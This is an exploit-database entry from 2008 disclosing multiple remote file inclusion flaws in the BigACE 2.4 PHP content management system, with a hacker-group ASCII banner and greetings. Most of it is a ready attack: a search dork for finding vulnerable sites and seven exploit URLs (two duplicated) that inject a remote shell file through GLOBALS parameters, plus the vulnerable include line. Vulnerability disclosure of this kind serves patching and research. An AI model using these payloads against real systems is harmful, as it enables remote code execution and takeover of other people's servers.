BigACE 2.4 - Multiple Remote File Inclusions
Author: BiNgZa
type: webapps
platform: php
port:
date_added: 2008-05-11
date_updated:
verified: 1
codes: OSVDB-45043;CVE-2008-2520;OSVDB-45042;OSVDB-45041;OSVDB-45040;OSVDB-45039
tags:
aliases:
screenshot_url:
application_url:
/ \
_ ) (( )) (
(@) /|\ ))_(( /|\
|-| / | \ (/\|/\) / | \ (@)
| |--------------------/--|-voV---\`|'/--Vov-|--\---------------------|-|
|-| '^` (o o) '^` | |
| | `\Y/' |-|
|-| | |
| | -=ShAd0w-CrEw=- |-|
|-| | |
| | |-|
|_|___________________________________________________________________| |
(@) l /\ / ( ( \ /\ l |-|
l / V \ \ V \ l (@)
l/ _) )_ \I
`\ /'
`
----------------------------------------------
GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To
----------------------------------------------
Fabian, CraCkEr, ICQBomber w3tw0rk Str0ke
----------------------------------------------
BiG sHoUt OuT tO sh4d0w-crew.net
----------------------------------------------
Script Download:http://sourceforge.net/project/platformdownload.php?group_id=149865
Dork: "Powered by BIGACE 2.4"
Vulnerability Type: Remote File Inclusion
Vulnerable file: /bigace/system/admin/plugins/menu/menuTree/plugin.php
Exploit URL: http://localhost/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://localhost/shell.txt?
http://localhost/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://localhost/shell.txt?
http://localhost/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://localhost/shell.txt?
http://localhost/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://localhost/shell.txt?
http://localhost/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://localhost/shell.txt?
http://localhost/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://localhost/shell.txt?
http://localhost/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: GLOBALS[_BIGACE][DIR][admin]
Line number: 90
Lines:
----------------------------------------------
include_once( dirname(__FILE__).'/menu_item_listing.php');
include_once( $GLOBALS['_BIGACE']['DIR']['admin'] . 'include/item_main.php' );
}
----------------------------------------------[/code]
# milw0rm.com [2008-05-12]